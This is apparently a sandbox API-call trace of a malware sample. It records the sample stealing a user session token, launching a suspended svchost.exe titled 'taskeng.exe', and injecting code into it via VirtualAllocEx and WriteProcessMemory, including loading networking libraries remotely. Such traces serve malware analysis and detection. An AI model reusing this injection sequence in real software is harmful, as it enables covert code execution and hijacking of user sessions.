	[0214.686] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffae0) returned 1
	[0214.686] CharLowerBuffA (in: lpsz="name", cchLength=0x4 | out: lpsz="name") returned 0x4
	[0214.686] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffae0) returned 1
	[0214.686] CharLowerBuffA (in: lpsz="autoconf", cchLength=0x8 | out: lpsz="autoconf") returned 0x8
	[0214.686] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffac8) returned 1
	[0214.686] CharLowerBuffA (in: lpsz="conf", cchLength=0x4 | out: lpsz="conf") returned 0x4
	[0214.686] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffac8) returned 1
	[0214.686] CharLowerBuffA (in: lpsz="ctl", cchLength=0x3 | out: lpsz="ctl") returned 0x3
	[0214.686] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffac8) returned 1
	[0214.686] CharLowerBuffA (in: lpsz="file", cchLength=0x4 | out: lpsz="file") returned 0x4
	[0214.686] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffab0) returned 1
	[0214.686] CharLowerBuffA (in: lpsz="period", cchLength=0x6 | out: lpsz="period") returned 0x6
	[0214.686] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb28) returned 1
	[0214.686] CharLowerBuffA (in: lpsz="id", cchLength=0x2 | out: lpsz="id") returned 0x2
	[0214.686] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff978) returned 1
	[0214.686] CharLowerBuffA (in: lpsz="ip", cchLength=0x2 | out: lpsz="ip") returned 0x2
	[0214.686] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff978) returned 1
	[0214.736] WriteFile (in: hFile=0x598, lpBuffer=0x26a80a0*, nNumberOfBytesToWrite=0x4ab0, lpNumberOfBytesWritten=0x128c38, lpOverlapped=0x0 | out: lpBuffer=0x26a80a0*, lpNumberOfBytesWritten=0x128c38*=0x4ab0, lpOverlapped=0x0) returned 1
	[0214.738] CloseHandle (hObject=0x598) returned 1
	[0214.738] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26a80a0) returned 1
	[0214.738] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b6298) returned 1
	[0214.738] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c7158) returned 1
	[0214.738] WinHttpCloseHandle (hInternet=0x22c98d8) returned 1
	[0214.738] WinHttpCloseHandle (hInternet=0x22c5160) returned 1
	[0214.738] WinHttpCloseHandle (hInternet=0x22c56d0) returned 1
	[0214.738] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2733160) returned 1
	[0214.738] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff2d0, Size=0x10) returned 0x22acdd8
	[0214.738] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2732e18) returned 1
	[0214.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="networkDll32", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13
	[0214.738] lstrcmpiW (lpString1="start", lpString2="start") returned 0
	[0214.739] WTSEnumerateSessionsA (in: hServer=0x0, Reserved=0x0, Version=0x1, ppSessionInfo=0x12875c, pCount=0x12876c | out: ppSessionInfo=0x12875c, pCount=0x12876c) returned 1
	[0214.742] WTSFreeMemory (pMemory=0x22a6378) 
	[0214.742] RevertToSelf () returned 1
	[0214.742] WTSQueryUserToken (SessionId=0x1, phToken=0x12877c*=0xffffffff) returned 1
	[0214.742] DuplicateTokenEx (in: hExistingToken=0x598, dwDesiredAccess=0x2000000, lpTokenAttributes=0x0, ImpersonationLevel=0x1, TokenType=0x1, phNewToken=0x128790 | out: phNewToken=0x128790*=0x57c) returned 1
	[0214.742] CloseHandle (hObject=0x598) returned 1
	[0214.742] GetTokenInformation (in: TokenHandle=0x57c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x128788 | out: TokenInformation=0x0, ReturnLength=0x128788) returned 0
	[0214.742] GetLastError () returned 0x7a
	[0214.742] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6378
	[0214.742] GetTokenInformation (in: TokenHandle=0x57c, TokenInformationClass=0x1, TokenInformation=0x22a6378, TokenInformationLength=0x24, ReturnLength=0x128788 | out: TokenInformation=0x22a6378, ReturnLength=0x128788) returned 1
	[0214.742] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x22a6380*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xb)), Name=0x1283a8, cchName=0x128768, ReferencedDomainName=0x1281a8, cchReferencedDomainName=0x128768, peUse=0x128740 | out: Name="2XC7u663GxWc", cchName=0x128768, ReferencedDomainName="ZGW5TDPU", cchReferencedDomainName=0x128768, peUse=0x128740) returned 1
	[0214.743] LoadUserProfileW () returned 0x1
	[0214.828] CreateEnvironmentBlock () returned 0x1
	[0214.831] CreateProcessAsUserW (in: hToken=0x57c, lpApplicationName=0x0, lpCommandLine="svchost.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000424, lpEnvironment=0x26d4200, lpCurrentDirectory=0x0, lpStartupInfo=0x1286bc*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1d68c8, hStdOutput=0x2732e18, hStdError=0x1d6c70), lpProcessInformation=0x128730 | out: lpCommandLine="svchost.exe", lpProcessInformation=0x128730*(hProcess=0x584, hThread=0x578, dwProcessId=0xa70, dwThreadId=0xa6c)) returned 1
	[0214.834] UnloadUserProfile () returned 0x1
	[0214.835] CloseHandle (hObject=0x57c) returned 1
	[0214.835] DestroyEnvironmentBlock () returned 0x1
	[0214.835] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6378) returned 1
	[0214.835] AdjustTokenPrivileges (in: TokenHandle=0x548, DisableAllPrivileges=0, NewState=0x128700, BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0214.836] CloseHandle (hObject=0x548) returned 1
	[0214.836] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2732e18) returned 1
	[0214.836] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2732e18
	[0214.836] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x548
	[0214.836] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x57c
	[0214.836] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x4b0
	[0214.836] GetCurrentProcess () returned 0xffffffff
	[0214.836] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x548, hTargetProcessHandle=0x584, lpTargetHandle=0x128808, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x128808*=0x4) returned 1
	[0214.836] GetCurrentProcess () returned 0xffffffff
	[0214.836] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x57c, hTargetProcessHandle=0x584, lpTargetHandle=0x12880c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x12880c*=0x8) returned 1
	[0214.836] GetCurrentProcess () returned 0xffffffff
	[0214.836] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4b0, hTargetProcessHandle=0x584, lpTargetHandle=0x128810, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x128810*=0xc) returned 1
	[0214.836] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x16f, flAllocationType=0x3000, flProtect=0x40) returned 0x50000
	[0214.836] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x50000, lpBuffer=0xd712d0*, nSize=0x16f, lpNumberOfBytesWritten=0x1286b4 | out: lpBuffer=0xd712d0*, lpNumberOfBytesWritten=0x1286b4*=0x16f) returned 1
	[0214.837] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0214.837] GetProcAddress (hModule=0x76b10000, lpProcName="SignalObjectAndWait") returned 0x76b761d9
	[0214.837] GetProcAddress (hModule=0x76b10000, lpProcName="WaitForSingleObject") returned 0x76b5ba90
	[0214.837] GetProcAddress (hModule=0x76b10000, lpProcName="CloseHandle") returned 0x76b5ca7c
	[0214.837] GetProcAddress (hModule=0x76b10000, lpProcName="ResetEvent") returned 0x76b5bcb4
	[0214.838] GetProcAddress (hModule=0x76b10000, lpProcName="ExitProcess") returned 0x76b6214f
	[0214.838] GetProcAddress (hModule=0x76b10000, lpProcName="InitializeCriticalSection") returned 0x7738a149
	[0214.838] GetProcAddress (hModule=0x76b10000, lpProcName="EnterCriticalSection") returned 0x773777a0
	[0214.838] GetProcAddress (hModule=0x76b10000, lpProcName="LeaveCriticalSection") returned 0x77377760
	[0214.838] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x70, flAllocationType=0x3000, flProtect=0x40) returned 0x60000
	[0214.838] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128808*, nSize=0x70, lpNumberOfBytesWritten=0x1286b4 | out: lpBuffer=0x128808*, lpNumberOfBytesWritten=0x1286b4*=0x70) returned 1
	[0214.839] NtQueryInformationProcess (in: ProcessHandle=0x584, ProcessInformationClass=0x0, ProcessInformation=0x12869c, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x12869c, ReturnLength=0x0) returned 0x0
	[0214.839] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x7ffdf000, lpBuffer=0x1286b4, nSize=0x10, lpNumberOfBytesRead=0x128540 | out: lpBuffer=0x1286b4*, lpNumberOfBytesRead=0x128540*=0x10) returned 1
	[0214.839] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x600000, lpBuffer=0x12865c, nSize=0x40, lpNumberOfBytesRead=0x128540 | out: lpBuffer=0x12865c*, lpNumberOfBytesRead=0x128540*=0x40) returned 1
	[0214.839] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x6000d8, lpBuffer=0x128564, nSize=0xf8, lpNumberOfBytesRead=0x128540 | out: lpBuffer=0x128564*, lpNumberOfBytesRead=0x128540*=0xf8) returned 1
	[0214.839] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x602104, lpBuffer=0x128878*, nSize=0xc, lpNumberOfBytesWritten=0x1286b4 | out: lpBuffer=0x128878*, lpNumberOfBytesWritten=0x1286b4*=0xc) returned 1
	[0214.839] ResetEvent (hEvent=0x57c) returned 1
	[0214.839] ResetEvent (hEvent=0x548) returned 1
	[0214.839] ResumeThread (hThread=0x578) returned 0x1
	[0214.853] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0214.853] VirtualAllocEx (hProcess=0x584, lpAddress=0x10000000, dwSize=0x8000, flAllocationType=0x2000, flProtect=0x40) returned 0x10000000
	[0214.853] VirtualAllocEx (hProcess=0x584, lpAddress=0x10000000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x10000000
	[0214.853] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10000000, lpBuffer=0x27456b0*, nSize=0x400, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x27456b0*, lpNumberOfBytesWritten=0x1287dc*=0x400) returned 1
	[0214.854] VirtualProtectEx (in: hProcess=0x584, lpAddress=0x10000000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x1287dc | out: lpflOldProtect=0x1287dc*=0x4) returned 1
	[0214.854] VirtualAllocEx (hProcess=0x584, lpAddress=0x10001000, dwSize=0x2400, flAllocationType=0x1000, flProtect=0x4) returned 0x10001000
	[0214.854] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x2400) returned 0x2740c28
	[0214.854] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10001000, lpBuffer=0x2740c28*, nSize=0x2400, lpNumberOfBytesWritten=0x1287c8 | out: lpBuffer=0x2740c28*, lpNumberOfBytesWritten=0x1287c8*=0x2400) returned 1
	[0214.855] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10001000, lpBuffer=0x2745ab0*, nSize=0x2400, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x2745ab0*, lpNumberOfBytesWritten=0x1287dc*=0x2400) returned 1
	[0214.855] VirtualAllocEx (hProcess=0x584, lpAddress=0x10004000, dwSize=0x1c00, flAllocationType=0x1000, flProtect=0x4) returned 0x10004000
	[0214.855] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2740c28, Size=0x1c00) returned 0x2740c28
	[0214.855] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10004000, lpBuffer=0x2740c28*, nSize=0x1c00, lpNumberOfBytesWritten=0x1287c8 | out: lpBuffer=0x2740c28*, lpNumberOfBytesWritten=0x1287c8*=0x1c00) returned 1
	[0214.856] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10004000, lpBuffer=0x2747eb0*, nSize=0x1c00, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x2747eb0*, lpNumberOfBytesWritten=0x1287dc*=0x1c00) returned 1
	[0214.856] VirtualAllocEx (hProcess=0x584, lpAddress=0x10006000, dwSize=0x40c, flAllocationType=0x1000, flProtect=0x4) returned 0x10006000
	[0214.856] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2740c28, Size=0x410) returned 0x2740c28
	[0214.857] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10006000, lpBuffer=0x2740c28*, nSize=0x40c, lpNumberOfBytesWritten=0x1287c8 | out: lpBuffer=0x2740c28*, lpNumberOfBytesWritten=0x1287c8*=0x40c) returned 1
	[0214.857] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10006000, lpBuffer=0x2749ab0*, nSize=0x200, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x2749ab0*, lpNumberOfBytesWritten=0x1287dc*=0x200) returned 1
	[0214.857] VirtualAllocEx (hProcess=0x584, lpAddress=0x10007000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x10007000
	[0214.857] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2740c28, Size=0x400) returned 0x2740c28
	[0214.857] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10007000, lpBuffer=0x2740c28*, nSize=0x400, lpNumberOfBytesWritten=0x1287c8 | out: lpBuffer=0x2740c28*, lpNumberOfBytesWritten=0x1287c8*=0x400) returned 1
	[0214.858] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10007000, lpBuffer=0x2749cb0*, nSize=0x400, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x2749cb0*, lpNumberOfBytesWritten=0x1287dc*=0x400) returned 1
	[0214.858] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0214.859] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0214.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x274964c, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11
	[0214.859] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733188
	[0214.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x274964c, cbMultiByte=-1, lpWideCharStr=0x2733188, cchWideChar=11 | out: lpWideCharStr="WS2_32.dll") returned 11
	[0214.859] lstrlenW (lpString="WS2_32.dll") returned 10
	[0214.859] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0214.859] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x2733188*, nSize=0x16, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x2733188*, lpNumberOfBytesWritten=0x128674*=0x16) returned 1
	[0214.859] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128618, nSize=0x70, lpNumberOfBytesRead=0x1285f8 | out: lpBuffer=0x128618*, lpNumberOfBytesRead=0x1285f8*=0x70) returned 1
	[0214.859] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0214.859] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0214.859] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0xc, lpNumberOfBytesWritten=0x1285f0 | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285f0*=0xc) returned 1
	[0214.860] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128618*, nSize=0x70, lpNumberOfBytesWritten=0x1285f0 | out: lpBuffer=0x128618*, lpNumberOfBytesWritten=0x1285f0*=0x70) returned 1
	[0214.860] ResetEvent (hEvent=0x548) returned 1
	[0214.860] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0214.863] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128618, nSize=0x70, lpNumberOfBytesRead=0x1285f0 | out: lpBuffer=0x128618*, lpNumberOfBytesRead=0x1285f0*=0x70) returned 1
	[0214.863] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0214.864] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0214.864] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0214.864] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2733188) returned 1
	[0214.864] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0214.864] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0214.864] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0214.864] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0214.864] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0214.864] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0214.865] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0214.865] ResetEvent (hEvent=0x548) returned 1
	[0214.865] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0214.865] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0214.865] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0214.865] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0214.865] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x100040ec, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0214.866] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0214.866] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0214.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2749658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13
	[0214.866] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733188
	[0214.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2749658, cbMultiByte=-1, lpWideCharStr=0x2733188, cchWideChar=13 | out: lpWideCharStr="ACTIVEDS.dll") returned 13
	[0214.866] lstrlenW (lpString="ACTIVEDS.dll") returned 12
	[0214.866] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0214.866] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x2733188*, nSize=0x1a, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x2733188*, lpNumberOfBytesWritten=0x128674*=0x1a) returned 1
	[0214.867] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128618, nSize=0x70, lpNumberOfBytesRead=0x1285f8 | out: lpBuffer=0x128618*, lpNumberOfBytesRead=0x1285f8*=0x70) returned 1
	[0214.867] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0214.867] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0214.867] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0xc, lpNumberOfBytesWritten=0x1285f0 | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285f0*=0xc) returned 1
	[0214.867] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128618*, nSize=0x70, lpNumberOfBytesWritten=0x1285f0 | out: lpBuffer=0x128618*, lpNumberOfBytesWritten=0x1285f0*=0x70) returned 1
	[0214.867] ResetEvent (hEvent=0x548) returned 1
	[0214.868] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.277] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128618, nSize=0x70, lpNumberOfBytesRead=0x1285f0 | out: lpBuffer=0x128618*, lpNumberOfBytesRead=0x1285f0*=0x70) returned 1
	[0215.277] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.277] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.277] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.278] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2733188) returned 1
	[0215.278] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.278] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.278] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.278] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.278] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.278] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.279] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.279] ResetEvent (hEvent=0x548) returned 1
	[0215.279] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.279] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.279] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.280] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.280] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10004000, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.280] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.280] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0215.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27496dc, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12
	[0215.281] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733188
	[0215.281] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27496dc, cbMultiByte=-1, lpWideCharStr=0x2733188, cchWideChar=12 | out: lpWideCharStr="WININET.dll") returned 12
	[0215.281] lstrlenW (lpString="WININET.dll") returned 11
	[0215.281] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.281] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x2733188*, nSize=0x18, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x2733188*, lpNumberOfBytesWritten=0x128674*=0x18) returned 1
	[0215.281] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128618, nSize=0x70, lpNumberOfBytesRead=0x1285f8 | out: lpBuffer=0x128618*, lpNumberOfBytesRead=0x1285f8*=0x70) returned 1
	[0215.282] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.282] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.282] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0xc, lpNumberOfBytesWritten=0x1285f0 | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285f0*=0xc) returned 1
	[0215.282] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128618*, nSize=0x70, lpNumberOfBytesWritten=0x1285f0 | out: lpBuffer=0x128618*, lpNumberOfBytesWritten=0x1285f0*=0x70) returned 1
	[0215.282] ResetEvent (hEvent=0x548) returned 1
	[0215.282] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.300] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128618, nSize=0x70, lpNumberOfBytesRead=0x1285f0 | out: lpBuffer=0x128618*, lpNumberOfBytesRead=0x1285f0*=0x70) returned 1
	[0215.301] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
